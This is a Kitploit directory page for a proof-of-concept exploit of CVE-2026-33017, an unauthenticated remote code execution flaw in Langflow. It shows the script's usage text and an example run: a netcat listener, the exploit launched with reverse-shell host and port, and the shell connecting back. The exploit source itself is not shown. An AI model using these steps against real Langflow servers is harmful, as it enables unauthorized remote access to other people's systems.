Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
PoC-CVE-2026-33017 — Proof-of-concept exploit for CVE-2026-33017 (Langflow <= 1.8.1). | Kitploit
Tools/GitHubGitHub/masterwok/poc-cve-2026-33017
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRemote Access Tool
GitHubmasterwok/poc-cve-2026-33017

PoC-CVE-2026-33017

Proof-of-concept exploit for CVE-2026-33017 (Langflow <= 1.8.1).

View Repository
25 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

PoC: CVE-2026-33017

Langflow <= 1.8.1 is vulnerable to a remote, unauthenticated RCE (https://nvd.nist.gov/vuln/detail/CVE-2026-33017)


Usage

root@kitploit:~
usage: CVE-2026-33017.py [-h] --lhost LHOST --lport LPORT target

PoC exploit: CVE-2026-33017

positional arguments:
  target         Target hostname

options:
  -h, --help     show this help message and exit
  --lhost LHOST  Reverse shell destination IP address
  --lport LPORT  Reverse shell destination port

Example

root@kitploit:~
# Create docker instance
docker run -d -p 7860:7860 langflowai/langflow:1.8.1

# Start listener
nc -lnvp 4444

# Launch exploit
python3 CVE-2026-33017.py 127.0.0.1 --lhost 192.168.1.17 --lport 4444

# Should receive reverse shell in listener
Listening on 0.0.0.0 4444
Connection received on 172.17.0.2 42712
uname -a
Linux 9be89ace430c 6.14.0-37-generic #37~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Nov 20 10:25:38 UTC 2 x86_64 GNU/Linux

This project is provided for educational and research purposes only. The author is not responsible for misuse or damage caused by this code.

Download Tool